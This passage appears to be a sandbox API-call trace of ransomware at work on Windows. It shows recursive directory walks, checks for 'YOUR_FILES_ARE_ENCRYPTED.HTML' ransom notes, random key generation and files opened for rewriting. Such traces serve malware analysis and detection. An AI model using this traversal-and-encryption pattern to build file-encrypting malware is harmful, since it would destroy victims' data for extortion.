lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Data", cAlternateFileName="")) returned 1 [0169.957] GetProcessHeap () returned 0x270000 [0169.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.957] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data" [0169.957] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*" [0169.957] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.957] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.957] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0169.957] GetProcessHeap () returned 0x270000 [0169.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.958] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications" [0169.959] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*" [0169.959] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.959] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0f087d0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd231e170, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd231e170, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows", cAlternateFileName="")) returned 1 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbef7f40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.960] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.960] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbef7f40, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbef7f40, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.960] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.960] GetProcessHeap () returned 0x270000 [0169.961] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.961] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0169.961] GetProcessHeap () returned 0x270000 [0169.961] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.961] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp" [0169.961] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*" [0169.961] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0ebc510, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.962] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.962] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.962] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.962] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.962] GetProcessHeap () returned 0x270000 [0169.963] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.963] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.963] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.963] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.963] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.963] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.963] GetProcessHeap () returned 0x270000 [0169.964] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.964] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.964] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbf1e0a0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.964] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.964] GetProcessHeap () returned 0x270000 [0169.965] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.965] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Account Pictures", cAlternateFileName="USERAC~1")) returned 1 [0169.965] GetProcessHeap () returned 0x270000 [0169.965] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.965] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures" [0169.965] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*" [0169.965] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.966] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbf904c0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf904c0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.966] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd282d030, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd282d030, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd282d030, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="5AlR3U30D3.dat", cAlternateFileName="5ALR3U~1.DAT")) returned 1 [0169.966] lstrcmpW (lpString1="5AlR3U30D3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.966] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0169.966] lstrlenW (lpString=".dat") returned 4 [0169.966] PathFindExtensionW (pszPath="5AlR3U30D3.dat") returned=".dat" [0169.966] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0169.966] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\5AlR3U30D3.dat" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\5alr3u30d3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5fc [0169.967] GetFileSizeEx (in: hFile=0x5fc, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=0) returned 1 [0169.967] CloseHandle (hObject=0x5fc) returned 1 [0169.967] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Default Pictures", cAlternateFileName="DEFAUL~1")) returned 1 [0169.967] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned 71 [0169.967] GetProcessHeap () returned 0x270000 [0169.967] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.967] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures" [0169.967] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*" [0169.967] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.967] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xcbf6a360, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf6a360, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.967] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf171085c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile10.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile10.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile10.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5270cf0e, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x5270cf0e, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf17369bc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile11.bmp", cAlternateFileName="")) returned 1 [0169.968] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 86 [0169.968] lstrcmpW (lpString1="usertile11.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.968] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0169.968] lstrlenW (lpString=".bmp") returned 4 [0169.968] PathFindExtensionW (pszPath="usertile11.bmp") returned=".bmp" [0169.968] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52733076, ftCreationTime.dwHighDateTime=0x1ca0408, ftLastAccessTime.dwLowDateTime=0x52733076, ftLastAccessTime.dwHighDateTime=0x1ca0408, ftLastWriteTime.dwLowDateTime=0xf1c4587c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0169.968] 